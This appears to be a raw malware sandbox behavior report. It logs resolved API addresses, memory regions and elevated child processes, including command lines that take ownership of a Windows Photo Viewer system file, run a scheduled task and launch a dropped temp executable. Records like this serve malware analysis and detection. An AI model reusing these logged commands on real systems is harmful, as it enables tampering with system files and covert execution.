| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75271b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77d02570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75277920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77cf9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x752862a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75286590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75286860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75279680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x752864a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7527a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x752a28e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7527a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75286020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x752777b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7527fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75279a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75271ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75271da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75279930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7527a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75278770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7527fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75279fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75277910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75279a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75272dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75271d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75272b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7527a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7527a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77cdbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x752864f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x76a2ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x76a2fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x76a295e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x76a30680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x76a2ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x76a2f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x76a2ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x76a2ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x76a2f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x76a306c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x76a2efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x76a2f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x7516c6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x770aee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x770855a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x770857e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x77089590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x77080820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x770afbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x771638f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x7717b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x7717b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x77167740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x771774e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x7717efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x77184ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x77174580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x77171540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x748e1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x748e1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x748e1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7527a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7527f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75277580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75279910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75286030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75285f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75285ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7527a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7527a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77cd40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77ccd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77ccecf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75285720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77cce140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77cceb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77d09990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77d05540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77cf9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7527a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x752a0a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74fa0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7527f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7527fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x752a1030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7527a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x752a14b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7527a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x752a16f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75279970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f23c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75278710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x752796e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-09 19:48:04 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #158: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #158 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:53, Reason: Child Process |
| Unmonitor | End Time: 00:02:56, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x118 |
| Parent PID | 0x6d4 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
D6C
0x
C44
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00210000 | 0x0021ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000d40000 | 0x00d40000 | 0x04d3ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004d40000 | 0x04d40000 | 0x04d5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004d40000 | 0x04d40000 | 0x04d4ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004d50000 | 0x04d50000 | 0x04d53fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d60000 | 0x04d60000 | 0x04d61fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x04d60000 | 0x04d64fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000004d70000 | 0x04d70000 | 0x04d83fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004d90000 | 0x04d90000 | 0x04dcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004dd0000 | 0x04dd0000 | 0x04e0ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004e10000 | 0x04e10000 | 0x04e13fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004e20000 | 0x04e20000 | 0x04e20fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004e30000 | 0x04e30000 | 0x04e31fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e40000 | 0x04e40000 | 0x04e40fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e50000 | 0x04e50000 | 0x04e5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e60000 | 0x04e60000 | 0x050affff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04e60000 | 0x04f1dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004f20000 | 0x04f20000 | 0x04f5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f60000 | 0x04f60000 | 0x04f9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004fa0000 | 0x04fa0000 | 0x04fa0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004fb0000 | 0x04fb0000 | 0x050affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000050b0000 | 0x050b0000 | 0x050cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000050d0000 | 0x050d0000 | 0x05257fff | Pagefile Backed Memory | r |
|
|
|
- |
| imm32.dll | 0x05260000 | 0x05289fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000005260000 | 0x05260000 | 0x053e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000053f0000 | 0x053f0000 | 0x067effff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x067f0000 | 0x06b26fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x748a0000 | 0x748c7fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f260000 | 0x7f260000 | 0x7f35ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f360000 | 0x7f360000 | 0x7f382fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f383000 | 0x7f383000 | 0x7f383fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f389000 | 0x7f389000 | 0x7f38bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f38c000 | 0x7f38c000 | 0x7f38efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f38f000 | 0x7f38f000 | 0x7f38ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #159: schtasks.exe
10
0
| Information | Value |
|---|---|
| ID | #159 |
| File Name | c:\windows\syswow64\schtasks.exe |
| Command Line | schtasks /Run /I /tn DSHCA |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:53, Reason: Child Process |
| Unmonitor | End Time: 00:02:57, Reason: Self Terminated |
| Monitor Duration | 00:00:04 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd50 |
| Parent PID | 0xf0c (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
DF4
0x
E24
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| schtasks.exe | 0x008a0000 | 0x008d1fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x00000000008f0000 | 0x008f0000 | 0x048effff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00000000048f0000 | 0x048f0000 | 0x0490ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000048f0000 | 0x048f0000 | 0x048fffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004900000 | 0x04900000 | 0x04903fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004910000 | 0x04910000 | 0x04911fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004910000 | 0x04910000 | 0x04910fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004920000 | 0x04920000 | 0x04933fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004940000 | 0x04940000 | 0x0497ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004980000 | 0x04980000 | 0x049bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000049c0000 | 0x049c0000 | 0x049c3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000049d0000 | 0x049d0000 | 0x049d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000049e0000 | 0x049e0000 | 0x049e1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x049f0000 | 0x04aadfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004ab0000 | 0x04ab0000 | 0x04adffff | Private Memory | rw |
|
|
|
- |
| schtasks.exe.mui | 0x04ab0000 | 0x04ac2fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004ad0000 | 0x04ad0000 | 0x04adffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ae0000 | 0x04ae0000 | 0x04aeffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004af0000 | 0x04af0000 | 0x04c6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004af0000 | 0x04af0000 | 0x04b2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b30000 | 0x04b30000 | 0x04b6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b70000 | 0x04b70000 | 0x04c6ffff | Private Memory | rw |
|
|
|
- |
| ole32.dll | 0x04c70000 | 0x04d58fff | Memory Mapped File | r |
|
|
|
- |
| sortdefault.nls | 0x04c70000 | 0x04fa6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000004fb0000 | 0x04fb0000 | 0x04fb0fff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| taskschd.dll | 0x74810000 | 0x7489bfff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x76820000 | 0x768a1fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x76c90000 | 0x76d21fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77c30000 | 0x77c3bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e940000 | 0x7e940000 | 0x7ea3ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ea40000 | 0x7ea40000 | 0x7ea62fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ea65000 | 0x7ea65000 | 0x7ea65fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ea66000 | 0x7ea66000 | 0x7ea66fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ea6a000 | 0x7ea6a000 | 0x7ea6cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ea6d000 | 0x7ea6d000 | 0x7ea6ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
COM (3)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | TaskScheduler | ITaskService | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Execute | TaskScheduler | ITaskService | method_name = Connect |
|
1 | |
| Execute | TaskScheduler | ITaskService | method_name = GetFolder, new_interface = ITaskFolder |
|
1 |
File (6)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 54 |
|
1 |
Module (3)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\schtasks.exe | base_address = 0x8a0000 |
|
1 | |
| Get Filename | - | process_name = c:\windows\syswow64\schtasks.exe, file_name_orig = C:\Windows\SysWOW64\schtasks.exe, size = 260 |
|
2 |
Process #160: g13k6qzj64.exe
490
0
| Information | Value |
|---|---|
| ID | #160 |
| File Name | c:\users\ciihmn~1\appdata\local\temp\g13k6qzj64.exe |
| Command Line | G13k6QZj.exe -accepteula "PDIALOG.exe.mui" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:53, Reason: Child Process |
| Unmonitor | End Time: 00:03:03, Reason: Self Terminated |
| Monitor Duration | 00:00:10 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc54 |
| Parent PID | 0xcbc (c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C50
0x
DFC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00026fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00043fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0014ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00153fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x00160fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x00171fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00180000 | 0x0023dfff | Memory Mapped File | r |
|
|
|
- |
| imm32.dll | 0x00240000 | 0x00273fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x00246fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x00250fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x00260fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x003cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x004cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004d0000 | 0x004d0000 | 0x00657fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000660000 | 0x00660000 | 0x0075ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000660000 | 0x00660000 | 0x0071ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000750000 | 0x00750000 | 0x0075ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000760000 | 0x00760000 | 0x008e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000008f0000 | 0x008f0000 | 0x01ceffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001cf0000 | 0x01cf0000 | 0x01df2fff | Private Memory | rw |
|
|
|
- |
